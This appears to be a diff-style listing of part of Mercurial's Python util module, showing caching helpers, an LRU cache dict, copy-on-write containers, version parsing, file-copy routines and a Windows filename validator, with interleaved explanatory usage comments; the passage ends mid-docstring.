963 965 def setsockopt(self, res, level, optname, value):
964 966 if not self.states:
965 967 return
966 968
967 969 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
968 970 self.name, level, optname, value, res))
969 971
970 972 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
971 973 logdata=False, logdataapis=True):
972 974 """Turn a socket into a logging socket."""
973 975
974 976 observer = socketobserver(logh, name, reads=reads, writes=writes,
975 977 states=states, logdata=logdata,
976 978 logdataapis=logdataapis)
977 979 return socketproxy(fh, observer)
978 980
979 981 def version():
980 982 """Return version information if available."""
981 983 try:
982 984 from . import __version__
983 985 return __version__.version
984 986 except ImportError:
985 987 return 'unknown'
986 988
987 989 def versiontuple(v=None, n=4):
988 990 """Parses a Mercurial version string into an N-tuple.
989 991
990 992 The version string to be parsed is specified with the ``v`` argument.
991 993 If it isn't defined, the current Mercurial version string will be parsed.
992 994
993 995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
994 996 returned values:
995 997
996 998 >>> v = b'3.6.1+190-df9b73d2d444'
997 999 >>> versiontuple(v, 2)
998 1000 (3, 6)
999 1001 >>> versiontuple(v, 3)
1000 1002 (3, 6, 1)
1001 1003 >>> versiontuple(v, 4)
1002 1004 (3, 6, 1, '190-df9b73d2d444')
1003 1005
1004 1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1005 1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1006 1008
1007 1009 >>> v = b'3.6'
1008 1010 >>> versiontuple(v, 2)
1009 1011 (3, 6)
1010 1012 >>> versiontuple(v, 3)
1011 1013 (3, 6, None)
1012 1014 >>> versiontuple(v, 4)
1013 1015 (3, 6, None, None)
1014 1016
1015 1017 >>> v = b'3.9-rc'
1016 1018 >>> versiontuple(v, 2)
1017 1019 (3, 9)
1018 1020 >>> versiontuple(v, 3)
1019 1021 (3, 9, None)
1020 1022 >>> versiontuple(v, 4)
1021 1023 (3, 9, None, 'rc')
1022 1024
1023 1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1024 1026 >>> versiontuple(v, 2)
1025 1027 (3, 9)
1026 1028 >>> versiontuple(v, 3)
1027 1029 (3, 9, None)
1028 1030 >>> versiontuple(v, 4)
1029 1031 (3, 9, None, 'rc+2-02a8fea4289b')
1030 1032
1031 1033 >>> versiontuple(b'4.6rc0')
1032 1034 (4, 6, None, 'rc0')
1033 1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1034 1036 (4, 6, None, 'rc0+12-425d55e54f98')
1035 1037 >>> versiontuple(b'.1.2.3')
1036 1038 (None, None, None, '.1.2.3')
1037 1039 >>> versiontuple(b'12.34..5')
1038 1040 (12, 34, None, '..5')
1039 1041 >>> versiontuple(b'1.2.3.4.5.6')
1040 1042 (1, 2, 3, '.4.5.6')
1041 1043 """
1042 1044 if not v:
1043 1045 v = version()
1044 1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1045 1047 if not m:
1046 1048 vparts, extra = '', v
1047 1049 elif m.group(2):
1048 1050 vparts, extra = m.groups()
1049 1051 else:
1050 1052 vparts, extra = m.group(1), None
1051 1053
1052 1054 vints = []
1053 1055 for i in vparts.split('.'):
1054 1056 try:
1055 1057 vints.append(int(i))
1056 1058 except ValueError:
1057 1059 break
1058 1060 # (3, 6) -> (3, 6, None)
1059 1061 while len(vints) < 3:
1060 1062 vints.append(None)
1061 1063
1062 1064 if n == 2:
1063 1065 return (vints[0], vints[1])
1064 1066 if n == 3:
1065 1067 return (vints[0], vints[1], vints[2])
1066 1068 if n == 4:
1067 1069 return (vints[0], vints[1], vints[2], extra)
1068 1070
1069 1071 def cachefunc(func):
1070 1072 '''cache the result of function calls'''
1071 1073 # XXX doesn't handle keyword args
1072 1074 if func.__code__.co_argcount == 0:
1073 1075 cache = []
1074 1076 def f():
1075 1077 if len(cache) == 0:
1076 1078 cache.append(func())
1077 1079 return cache[0]
1078 1080 return f
1079 1081 cache = {}
1080 1082 if func.__code__.co_argcount == 1:
1081 1083 # we gain a small amount of time because
1082 1084 # we don't need to pack/unpack the list
1083 1085 def f(arg):
1084 1086 if arg not in cache:
1085 1087 cache[arg] = func(arg)
1086 1088 return cache[arg]
1087 1089 else:
1088 1090 def f(*args):
1089 1091 if args not in cache:
1090 1092 cache[args] = func(*args)
1091 1093 return cache[args]
1092 1094
1093 1095 return f
1094 1096
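# Illustrative sketch: memoizing a pure one-argument function. The
# cache is unbounded, so this is only suitable for small argument
# domains:
#
#   @cachefunc
#   def square(x):
#       return x * x
#
#   square(4)   # computed once, later calls hit the cache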
1095 1097 class cow(object):
1096 1098 """helper class to make copy-on-write easier
1097 1099
1098 1100 Call preparewrite before doing any writes.
1099 1101 """
1100 1102
1101 1103 def preparewrite(self):
1102 1104 """call this before writes, return self or a copied new object"""
1103 1105 if getattr(self, '_copied', 0):
1104 1106 self._copied -= 1
1105 1107 return self.__class__(self)
1106 1108 return self
1107 1109
1108 1110 def copy(self):
1109 1111 """always do a cheap copy"""
1110 1112 self._copied = getattr(self, '_copied', 0) + 1
1111 1113 return self
1112 1114
1113 1115 class sortdict(collections.OrderedDict):
1114 1116 '''a simple sorted dictionary
1115 1117
1116 1118 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1117 1119 >>> d2 = d1.copy()
1118 1120 >>> d2
1119 1121 sortdict([('a', 0), ('b', 1)])
1120 1122 >>> d2.update([(b'a', 2)])
1121 1123 >>> list(d2.keys()) # should still be in last-set order
1122 1124 ['b', 'a']
1123 1125 '''
1124 1126
1125 1127 def __setitem__(self, key, value):
1126 1128 if key in self:
1127 1129 del self[key]
1128 1130 super(sortdict, self).__setitem__(key, value)
1129 1131
1130 1132 if pycompat.ispypy:
1131 1133 # __setitem__() isn't called as of PyPy 5.8.0
1132 1134 def update(self, src):
1133 1135 if isinstance(src, dict):
1134 1136 src = src.iteritems()
1135 1137 for k, v in src:
1136 1138 self[k] = v
1137 1139
1138 1140 class cowdict(cow, dict):
1139 1141 """copy-on-write dict
1140 1142
1141 1143 Be sure to call d = d.preparewrite() before writing to d.
1142 1144
1143 1145 >>> a = cowdict()
1144 1146 >>> a is a.preparewrite()
1145 1147 True
1146 1148 >>> b = a.copy()
1147 1149 >>> b is a
1148 1150 True
1149 1151 >>> c = b.copy()
1150 1152 >>> c is a
1151 1153 True
1152 1154 >>> a = a.preparewrite()
1153 1155 >>> b is a
1154 1156 False
1155 1157 >>> a is a.preparewrite()
1156 1158 True
1157 1159 >>> c = c.preparewrite()
1158 1160 >>> b is c
1159 1161 False
1160 1162 >>> b is b.preparewrite()
1161 1163 True
1162 1164 """
1163 1165
1164 1166 class cowsortdict(cow, sortdict):
1165 1167 """copy-on-write sortdict
1166 1168
1167 1169 Be sure to call d = d.preparewrite() before writing to d.
1168 1170 """
1169 1171
1170 1172 class transactional(object):
1171 1173 """Base class for making a transactional type into a context manager."""
1172 1174 __metaclass__ = abc.ABCMeta
1173 1175
1174 1176 @abc.abstractmethod
1175 1177 def close(self):
1176 1178 """Successfully closes the transaction."""
1177 1179
1178 1180 @abc.abstractmethod
1179 1181 def release(self):
1180 1182 """Marks the end of the transaction.
1181 1183
1182 1184 If the transaction has not been closed, it will be aborted.
1183 1185 """
1184 1186
1185 1187 def __enter__(self):
1186 1188 return self
1187 1189
1188 1190 def __exit__(self, exc_type, exc_val, exc_tb):
1189 1191 try:
1190 1192 if exc_type is None:
1191 1193 self.close()
1192 1194 finally:
1193 1195 self.release()
1194 1196
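# Illustrative sketch: a minimal concrete transactional type; close()
# runs only on a clean exit from the context, release() always runs:
#
#   class demotx(transactional):
#       def close(self):
#           print('closed')
#       def release(self):
#           print('released')
#
#   with demotx():
#       pass   # prints 'closed' then 'released'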
1195 1197 @contextlib.contextmanager
1196 1198 def acceptintervention(tr=None):
1197 1199 """A context manager that closes the transaction on InterventionRequired
1198 1200
1199 1201 If no transaction was provided, this simply runs the body and returns
1200 1202 """
1201 1203 if not tr:
1202 1204 yield
1203 1205 return
1204 1206 try:
1205 1207 yield
1206 1208 tr.close()
1207 1209 except error.InterventionRequired:
1208 1210 tr.close()
1209 1211 raise
1210 1212 finally:
1211 1213 tr.release()
1212 1214
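# Illustrative sketch ('tr' stands for a hypothetical open
# transaction):
#
#   with acceptintervention(tr):
#       runstep()   # on InterventionRequired, tr is closed before the
#                   # exception propagates, so finished work is kept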
1213 1215 @contextlib.contextmanager
1214 1216 def nullcontextmanager():
1215 1217 yield
1216 1218
1217 1219 class _lrucachenode(object):
1218 1220 """A node in a doubly linked list.
1219 1221
1220 1222 Holds a reference to nodes on either side as well as a key-value
1221 1223 pair for the dictionary entry.
1222 1224 """
1223 1225 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1224 1226
1225 1227 def __init__(self):
1226 1228 self.next = None
1227 1229 self.prev = None
1228 1230
1229 1231 self.key = _notset
1230 1232 self.value = None
1231 1233 self.cost = 0
1232 1234
1233 1235 def markempty(self):
1234 1236 """Mark the node as emptied."""
1235 1237 self.key = _notset
1236 1238 self.value = None
1237 1239 self.cost = 0
1238 1240
1239 1241 class lrucachedict(object):
1240 1242 """Dict that caches most recent accesses and sets.
1241 1243
1242 1244 The dict consists of an actual backing dict - indexed by original
1243 1245 key - and a doubly linked circular list defining the order of entries in
1244 1246 the cache.
1245 1247
1246 1248 The head node is the newest entry in the cache. If the cache is full,
1247 1249 we recycle head.prev and make it the new head. Cache accesses result in
1248 1250 the node being moved to before the existing head and being marked as the
1249 1251 new head node.
1250 1252
1251 1253 Items in the cache can be inserted with an optional "cost" value. This is
1252 1254 simply an integer that is specified by the caller. The cache can be queried
1253 1255 for the total cost of all items presently in the cache.
1254 1256
1255 1257 The cache can also define a maximum cost. If a cache insertion would
1256 1258 cause the total cost of the cache to go beyond the maximum cost limit,
1257 1259 nodes will be evicted to make room for the new item. This can be used
1258 1260 to e.g. set a max memory limit and associate an estimated bytes size
1259 1261 cost to each item in the cache. By default, no maximum cost is enforced.
1260 1262 """
1261 1263 def __init__(self, max, maxcost=0):
1262 1264 self._cache = {}
1263 1265
1264 1266 self._head = head = _lrucachenode()
1265 1267 head.prev = head
1266 1268 head.next = head
1267 1269 self._size = 1
1268 1270 self.capacity = max
1269 1271 self.totalcost = 0
1270 1272 self.maxcost = maxcost
1271 1273
1272 1274 def __len__(self):
1273 1275 return len(self._cache)
1274 1276
1275 1277 def __contains__(self, k):
1276 1278 return k in self._cache
1277 1279
1278 1280 def __iter__(self):
1279 1281 # We don't have to iterate in cache order, but why not.
1280 1282 n = self._head
1281 1283 for i in range(len(self._cache)):
1282 1284 yield n.key
1283 1285 n = n.next
1284 1286
1285 1287 def __getitem__(self, k):
1286 1288 node = self._cache[k]
1287 1289 self._movetohead(node)
1288 1290 return node.value
1289 1291
1290 1292 def insert(self, k, v, cost=0):
1291 1293 """Insert a new item in the cache with optional cost value."""
1292 1294 node = self._cache.get(k)
1293 1295 # Replace existing value and mark as newest.
1294 1296 if node is not None:
1295 1297 self.totalcost -= node.cost
1296 1298 node.value = v
1297 1299 node.cost = cost
1298 1300 self.totalcost += cost
1299 1301 self._movetohead(node)
1300 1302
1301 1303 if self.maxcost:
1302 1304 self._enforcecostlimit()
1303 1305
1304 1306 return
1305 1307
1306 1308 if self._size < self.capacity:
1307 1309 node = self._addcapacity()
1308 1310 else:
1309 1311 # Grab the last/oldest item.
1310 1312 node = self._head.prev
1311 1313
1312 1314 # At capacity. Kill the old entry.
1313 1315 if node.key is not _notset:
1314 1316 self.totalcost -= node.cost
1315 1317 del self._cache[node.key]
1316 1318
1317 1319 node.key = k
1318 1320 node.value = v
1319 1321 node.cost = cost
1320 1322 self.totalcost += cost
1321 1323 self._cache[k] = node
1322 1324 # And mark it as newest entry. No need to adjust order since it
1323 1325 # is already self._head.prev.
1324 1326 self._head = node
1325 1327
1326 1328 if self.maxcost:
1327 1329 self._enforcecostlimit()
1328 1330
1329 1331 def __setitem__(self, k, v):
1330 1332 self.insert(k, v)
1331 1333
1332 1334 def __delitem__(self, k):
1333 1335 self.pop(k)
1334 1336
1335 1337 def pop(self, k, default=_notset):
1336 1338 try:
1337 1339 node = self._cache.pop(k)
1338 1340 except KeyError:
1339 1341 if default is _notset:
1340 1342 raise
1341 1343 return default
1342 1344 value = node.value
1343 1345 self.totalcost -= node.cost
1344 1346 node.markempty()
1345 1347
1346 1348 # Temporarily mark as newest item before re-adjusting head to make
1347 1349 # this node the oldest item.
1348 1350 self._movetohead(node)
1349 1351 self._head = node.next
1350 1352
1351 1353 return value
1352 1354
1353 1355 # Additional dict methods.
1354 1356
1355 1357 def get(self, k, default=None):
1356 1358 try:
1357 1359 return self.__getitem__(k)
1358 1360 except KeyError:
1359 1361 return default
1360 1362
1361 1363 def peek(self, k, default=_notset):
1362 1364 """Get the specified item without moving it to the head
1363 1365
1364 1366 Unlike get(), this doesn't mutate the internal state. But be aware
1365 1367 that this does not make peek() thread safe.
1366 1368 """
1367 1369 try:
1368 1370 node = self._cache[k]
1369 1371 return node.value
1370 1372 except KeyError:
1371 1373 if default is _notset:
1372 1374 raise
1373 1375 return default
1374 1376
1375 1377 def clear(self):
1376 1378 n = self._head
1377 1379 while n.key is not _notset:
1378 1380 self.totalcost -= n.cost
1379 1381 n.markempty()
1380 1382 n = n.next
1381 1383
1382 1384 self._cache.clear()
1383 1385
1384 1386 def copy(self, capacity=None, maxcost=0):
1385 1387 """Create a new cache as a copy of the current one.
1386 1388
1387 1389 By default, the new cache has the same capacity as the existing one.
1388 1390 But, the cache capacity can be changed as part of performing the
1389 1391 copy.
1390 1392
1391 1393 Items in the copy have an insertion/access order matching this
1392 1394 instance.
1393 1395 """
1394 1396
1395 1397 capacity = capacity or self.capacity
1396 1398 maxcost = maxcost or self.maxcost
1397 1399 result = lrucachedict(capacity, maxcost=maxcost)
1398 1400
1399 1401 # We copy entries by iterating in oldest-to-newest order so the copy
1400 1402 # has the correct ordering.
1401 1403
1402 1404 # Find the first non-empty entry.
1403 1405 n = self._head.prev
1404 1406 while n.key is _notset and n is not self._head:
1405 1407 n = n.prev
1406 1408
1407 1409 # We could potentially skip the first N items when decreasing capacity.
1408 1410 # But let's keep it simple unless it is a performance problem.
1409 1411 for i in range(len(self._cache)):
1410 1412 result.insert(n.key, n.value, cost=n.cost)
1411 1413 n = n.prev
1412 1414
1413 1415 return result
1414 1416
1415 1417 def popoldest(self):
1416 1418 """Remove the oldest item from the cache.
1417 1419
1418 1420 Returns the (key, value) describing the removed cache entry.
1419 1421 """
1420 1422 if not self._cache:
1421 1423 return
1422 1424
1423 1425 # Walk the linked list backwards starting at tail node until we hit
1424 1426 # a non-empty node.
1425 1427 n = self._head.prev
1426 1428 while n.key is _notset:
1427 1429 n = n.prev
1428 1430
1429 1431 key, value = n.key, n.value
1430 1432
1431 1433 # And remove it from the cache and mark it as empty.
1432 1434 del self._cache[n.key]
1433 1435 self.totalcost -= n.cost
1434 1436 n.markempty()
1435 1437
1436 1438 return key, value
1437 1439
1438 1440 def _movetohead(self, node):
1439 1441 """Mark a node as the newest, making it the new head.
1440 1442
1441 1443 When a node is accessed, it becomes the freshest entry in the LRU
1442 1444 list, which is denoted by self._head.
1443 1445
1444 1446 Visually, let's make ``N`` the new head node (* denotes head):
1445 1447
1446 1448 previous/oldest <-> head <-> next/next newest
1447 1449
1448 1450 ----<->--- A* ---<->-----
1449 1451 | |
1450 1452 E <-> D <-> N <-> C <-> B
1451 1453
1452 1454 To:
1453 1455
1454 1456 ----<->--- N* ---<->-----
1455 1457 | |
1456 1458 E <-> D <-> C <-> B <-> A
1457 1459
1458 1460 This requires the following moves:
1459 1461
1460 1462 C.next = D (node.prev.next = node.next)
1461 1463 D.prev = C (node.next.prev = node.prev)
1462 1464 E.next = N (head.prev.next = node)
1463 1465 N.prev = E (node.prev = head.prev)
1464 1466 N.next = A (node.next = head)
1465 1467 A.prev = N (head.prev = node)
1466 1468 """
1467 1469 head = self._head
1468 1470 # C.next = D
1469 1471 node.prev.next = node.next
1470 1472 # D.prev = C
1471 1473 node.next.prev = node.prev
1472 1474 # N.prev = E
1473 1475 node.prev = head.prev
1474 1476 # N.next = A
1475 1477 # It is tempting to just use "head" here; however, if node is
1476 1478 # adjacent to head, this will do bad things.
1477 1479 node.next = head.prev.next
1478 1480 # E.next = N
1479 1481 node.next.prev = node
1480 1482 # A.prev = N
1481 1483 node.prev.next = node
1482 1484
1483 1485 self._head = node
1484 1486
1485 1487 def _addcapacity(self):
1486 1488 """Add a node to the circular linked list.
1487 1489
1488 1490 The new node is inserted before the head node.
1489 1491 """
1490 1492 head = self._head
1491 1493 node = _lrucachenode()
1492 1494 head.prev.next = node
1493 1495 node.prev = head.prev
1494 1496 node.next = head
1495 1497 head.prev = node
1496 1498 self._size += 1
1497 1499 return node
1498 1500
1499 1501 def _enforcecostlimit(self):
1500 1502 # This should run after an insertion. It should only be called if total
1501 1503 # cost limits are being enforced.
1502 1504 # The most recently inserted node is never evicted.
1503 1505 if len(self) <= 1 or self.totalcost <= self.maxcost:
1504 1506 return
1505 1507
1506 1508 # This is logically equivalent to calling popoldest() until we
1507 1509 # free up enough cost. We don't do that since popoldest() needs
1508 1510 # to walk the linked list and doing this in a loop would be
1509 1511 # quadratic. So we find the first non-empty node and then
1510 1512 # walk nodes until we free up enough capacity.
1511 1513 #
1512 1514 # If we only removed the minimum number of nodes to free enough
1513 1515 # cost at insert time, chances are high that the next insert would
1514 1516 # also require pruning. This would effectively constitute quadratic
1515 1517 # behavior for insert-heavy workloads. To mitigate this, we set a
1516 1518 # target cost that is a percentage of the max cost. This will tend
1517 1519 # to free more nodes when the high water mark is reached, which
1518 1520 # lowers the chances of needing to prune on the subsequent insert.
1519 1521 targetcost = int(self.maxcost * 0.75)
1520 1522
1521 1523 n = self._head.prev
1522 1524 while n.key is _notset:
1523 1525 n = n.prev
1524 1526
1525 1527 while len(self) > 1 and self.totalcost > targetcost:
1526 1528 del self._cache[n.key]
1527 1529 self.totalcost -= n.cost
1528 1530 n.markempty()
1529 1531 n = n.prev
1530 1532
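# Illustrative sketch: a small LRU with a cost ceiling; exceeding
# maxcost evicts from the oldest end (the newest insertion is never
# evicted):
#
#   d = lrucachedict(4, maxcost=100)
#   d.insert(b'a', b'x' * 60, cost=60)
#   d.insert(b'b', b'y' * 60, cost=60)   # total cost 120 > 100
#   b'a' in d                            # -> False, 'a' was evicted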
1531 1533 def lrucachefunc(func):
1532 1534 '''cache most recent results of function calls'''
1533 1535 cache = {}
1534 1536 order = collections.deque()
1535 1537 if func.__code__.co_argcount == 1:
1536 1538 def f(arg):
1537 1539 if arg not in cache:
1538 1540 if len(cache) > 20:
1539 1541 del cache[order.popleft()]
1540 1542 cache[arg] = func(arg)
1541 1543 else:
1542 1544 order.remove(arg)
1543 1545 order.append(arg)
1544 1546 return cache[arg]
1545 1547 else:
1546 1548 def f(*args):
1547 1549 if args not in cache:
1548 1550 if len(cache) > 20:
1549 1551 del cache[order.popleft()]
1550 1552 cache[args] = func(*args)
1551 1553 else:
1552 1554 order.remove(args)
1553 1555 order.append(args)
1554 1556 return cache[args]
1555 1557
1556 1558 return f
1557 1559
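# Illustrative sketch: unlike cachefunc above, only the ~20 most
# recently used distinct arguments stay cached:
#
#   import os
#   cachedstat = lrucachefunc(os.stat)
#   st = cachedstat('/tmp')   # repeated lookups are served from cache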
1558 1560 class propertycache(object):
1559 1561 def __init__(self, func):
1560 1562 self.func = func
1561 1563 self.name = func.__name__
1562 1564 def __get__(self, obj, type=None):
1563 1565 result = self.func(obj)
1564 1566 self.cachevalue(obj, result)
1565 1567 return result
1566 1568
1567 1569 def cachevalue(self, obj, value):
1568 1570 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1569 1571 obj.__dict__[self.name] = value
1570 1572
1571 1573 def clearcachedproperty(obj, prop):
1572 1574 '''clear a cached property value, if one has been set'''
1573 1575 prop = pycompat.sysstr(prop)
1574 1576 if prop in obj.__dict__:
1575 1577 del obj.__dict__[prop]
1576 1578
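# Illustrative sketch ('expensiveload' is made up): the first access
# runs the function and stores the result in the instance __dict__,
# bypassing the descriptor afterwards:
#
#   class demo(object):
#       @propertycache
#       def data(self):
#           return expensiveload()   # runs once per instance
#
#   clearcachedproperty(d, 'data')   # drop it to force recomputation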
1577 1579 def increasingchunks(source, min=1024, max=65536):
1578 1580 '''return no less than min bytes per chunk while data remains,
1579 1581 doubling min after each chunk until it reaches max'''
1580 1582 def log2(x):
1581 1583 if not x:
1582 1584 return 0
1583 1585 i = 0
1584 1586 while x:
1585 1587 x >>= 1
1586 1588 i += 1
1587 1589 return i - 1
1588 1590
1589 1591 buf = []
1590 1592 blen = 0
1591 1593 for chunk in source:
1592 1594 buf.append(chunk)
1593 1595 blen += len(chunk)
1594 1596 if blen >= min:
1595 1597 if min < max:
1596 1598 min = min << 1
1597 1599 nmin = 1 << log2(blen)
1598 1600 if nmin > min:
1599 1601 min = nmin
1600 1602 if min > max:
1601 1603 min = max
1602 1604 yield ''.join(buf)
1603 1605 blen = 0
1604 1606 buf = []
1605 1607 if buf:
1606 1608 yield ''.join(buf)
1607 1609
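# Illustrative sketch: chunks start near the 1k minimum and roughly
# double toward the 64k maximum, amortizing per-chunk overhead:
#
#   gen = increasingchunks(iter([b'x' * 700] * 4))
#   [len(c) for c in gen]   # -> [1400, 1400]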
1608 1610 def always(fn):
1609 1611 return True
1610 1612
1611 1613 def never(fn):
1612 1614 return False
1613 1615
1614 1616 def nogc(func):
1615 1617 """disable garbage collector
1616 1618
1617 1619 Python's garbage collector triggers a GC each time a certain number of
1618 1620 container objects (the number being defined by gc.get_threshold()) are
1619 1621 allocated even when marked not to be tracked by the collector. Tracking has
1620 1622 no effect on when GCs are triggered, only on what objects the GC looks
1621 1623 into. As a workaround, disable GC while building complex (huge)
1622 1624 containers.
1623 1625
1624 1626 This garbage collector issue has been fixed in 2.7, but it still affects
1625 1627 CPython's performance.
1626 1628 """
1627 1629 def wrapper(*args, **kwargs):
1628 1630 gcenabled = gc.isenabled()
1629 1631 gc.disable()
1630 1632 try:
1631 1633 return func(*args, **kwargs)
1632 1634 finally:
1633 1635 if gcenabled:
1634 1636 gc.enable()
1635 1637 return wrapper
1636 1638
1637 1639 if pycompat.ispypy:
1638 1640 # PyPy runs slower with gc disabled
1639 1641 nogc = lambda x: x
1640 1642
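# Illustrative sketch: wrapping a builder of large containers so the
# cyclic GC stays disabled for the duration of the call:
#
#   @nogc
#   def buildmap(items):
#       return {k: [k] for k in items}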
1641 1643 def pathto(root, n1, n2):
1642 1644 '''return the relative path from one place to another.
1643 1645 root should use os.sep to separate directories
1644 1646 n1 should use os.sep to separate directories
1645 1647 n2 should use "/" to separate directories
1646 1648 returns an os.sep-separated path.
1647 1649
1648 1650 If n1 is a relative path, it is assumed to be
1649 1651 relative to root.
1650 1652 n2 should always be relative to root.
1651 1653 '''
1652 1654 if not n1:
1653 1655 return localpath(n2)
1654 1656 if os.path.isabs(n1):
1655 1657 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 1658 return os.path.join(root, localpath(n2))
1657 1659 n2 = '/'.join((pconvert(root), n2))
1658 1660 a, b = splitpath(n1), n2.split('/')
1659 1661 a.reverse()
1660 1662 b.reverse()
1661 1663 while a and b and a[-1] == b[-1]:
1662 1664 a.pop()
1663 1665 b.pop()
1664 1666 b.reverse()
1665 1667 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1668
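# Illustrative sketch (POSIX-style separators):
#
#   pathto(b'/repo', b'/repo/a/b', b'c/d')   # -> b'../../c/d'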
1667 1669 # the location of data files matching the source code
1668 1670 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1669 1671 # executable version (py2exe) doesn't support __file__
1670 1672 datapath = os.path.dirname(pycompat.sysexecutable)
1671 1673 else:
1672 1674 datapath = os.path.dirname(pycompat.fsencode(__file__))
1673 1675
1674 1676 i18n.setdatapath(datapath)
1675 1677
1676 1678 def checksignature(func):
1677 1679 '''wrap a function with code to check for calling errors'''
1678 1680 def check(*args, **kwargs):
1679 1681 try:
1680 1682 return func(*args, **kwargs)
1681 1683 except TypeError:
1682 1684 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1683 1685 raise error.SignatureError
1684 1686 raise
1685 1687
1686 1688 return check
1687 1689
1688 1690 # a whitelist of known filesystems where hardlinks work reliably
1689 1691 _hardlinkfswhitelist = {
1690 1692 'apfs',
1691 1693 'btrfs',
1692 1694 'ext2',
1693 1695 'ext3',
1694 1696 'ext4',
1695 1697 'hfs',
1696 1698 'jfs',
1697 1699 'NTFS',
1698 1700 'reiserfs',
1699 1701 'tmpfs',
1700 1702 'ufs',
1701 1703 'xfs',
1702 1704 'zfs',
1703 1705 }
1704 1706
1705 1707 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1706 1708 '''copy a file, preserving mode and optionally other stat info like
1707 1709 atime/mtime
1708 1710
1709 1711 The checkambig argument is used with filestat, and is useful only if
1710 1712 the destination file is guarded by a lock (e.g. repo.lock or
1711 1713 repo.wlock).
1712 1714
1713 1715 copystat and checkambig should be exclusive.
1714 1716 '''
1715 1717 assert not (copystat and checkambig)
1716 1718 oldstat = None
1717 1719 if os.path.lexists(dest):
1718 1720 if checkambig:
1719 1721 oldstat = checkambig and filestat.frompath(dest)
1720 1722 unlink(dest)
1721 1723 if hardlink:
1722 1724 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1723 1725 # unless we are confident that dest is on a whitelisted filesystem.
1724 1726 try:
1725 1727 fstype = getfstype(os.path.dirname(dest))
1726 1728 except OSError:
1727 1729 fstype = None
1728 1730 if fstype not in _hardlinkfswhitelist:
1729 1731 hardlink = False
1730 1732 if hardlink:
1731 1733 try:
1732 1734 oslink(src, dest)
1733 1735 return
1734 1736 except (IOError, OSError):
1735 1737 pass # fall back to normal copy
1736 1738 if os.path.islink(src):
1737 1739 os.symlink(os.readlink(src), dest)
1738 1740 # copytime is ignored for symlinks, but in general copytime isn't needed
1739 1741 # for them anyway
1740 1742 else:
1741 1743 try:
1742 1744 shutil.copyfile(src, dest)
1743 1745 if copystat:
1744 1746 # copystat also copies mode
1745 1747 shutil.copystat(src, dest)
1746 1748 else:
1747 1749 shutil.copymode(src, dest)
1748 1750 if oldstat and oldstat.stat:
1749 1751 newstat = filestat.frompath(dest)
1750 1752 if newstat.isambig(oldstat):
1751 1753 # stat of copied file is ambiguous to original one
1752 1754 advanced = (
1753 1755 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1754 1756 os.utime(dest, (advanced, advanced))
1755 1757 except shutil.Error as inst:
1756 1758 raise error.Abort(str(inst))
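
# Call sites typically pass hardlink=True opportunistically; the function
# degrades to a plain copy when the destination filesystem is not
# whitelisted or oslink() fails, e.g. (hypothetical paths):
#
#   copyfile(b'/repo/.hg/store/data.i', b'/backup/data.i', hardlink=True)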
1757 1759
1758 1760 def copyfiles(src, dst, hardlink=None, progress=None):
1759 1761 """Copy a directory tree using hardlinks if possible."""
1760 1762 num = 0
1761 1763
1762 1764 def settopic():
1763 1765 if progress:
1764 1766 progress.topic = _('linking') if hardlink else _('copying')
1765 1767
1766 1768 if os.path.isdir(src):
1767 1769 if hardlink is None:
1768 1770 hardlink = (os.stat(src).st_dev ==
1769 1771 os.stat(os.path.dirname(dst)).st_dev)
1770 1772 settopic()
1771 1773 os.mkdir(dst)
1772 1774 for name, kind in listdir(src):
1773 1775 srcname = os.path.join(src, name)
1774 1776 dstname = os.path.join(dst, name)
1775 1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1776 1778 num += n
1777 1779 else:
1778 1780 if hardlink is None:
1779 1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1780 1782 os.stat(os.path.dirname(dst)).st_dev)
1781 1783 settopic()
1782 1784
1783 1785 if hardlink:
1784 1786 try:
1785 1787 oslink(src, dst)
1786 1788 except (IOError, OSError):
1787 1789 hardlink = False
1788 1790 shutil.copy(src, dst)
1789 1791 else:
1790 1792 shutil.copy(src, dst)
1791 1793 num += 1
1792 1794 if progress:
1793 1795 progress.increment()
1794 1796
1795 1797 return hardlink, num
1796 1798
1797 1799 _winreservednames = {
1798 1800 'con', 'prn', 'aux', 'nul',
1799 1801 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1800 1802 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1801 1803 }
1802 1804 _winreservedchars = ':*?"<>|'
1803 1805 def checkwinfilename(path):
1804 1806 r'''Check that the base-relative path is a valid filename on Windows.
1805 1807 Returns None if the path is ok, or a UI string describing the problem.
1806 1808
1807 1809 >>> checkwinfilename(b"just/a/normal/path")
1808 1810 >>> checkwinfilename(b"foo/bar/con.xml")
1809 1811 "filename contains 'con', which is reserved on Windows"
1810 1812 >>> checkwinfilename(b"foo/con.xml/bar")
1811 1813 "filename contains 'con', which is reserved on Windows"
1812 1814 >>> checkwinfilename(b"foo/bar/xml.con")
1813 1815 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1814 1816 "filename contains 'AUX', which is reserved on Windows"
1815 1817 >>> checkwinfilename(b"foo/bar/bla:.txt")
1816 1818 "filename contains ':', which is reserved on Windows"
1817 1819 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1818 1820 "filename contains '\\x07', which is invalid on Windows"
1819 1821 >>> checkwinfilename(b"foo/bar/bla ")
1820 1822 "filename ends with ' ', which is not allowed on Windows"
1821 1823 >>> checkwinfilename(b"../bar")
1822 1824 >>> checkwinfilename(b"foo\\")
1823 1825 "filename ends with '\\', which is invalid on Windows"
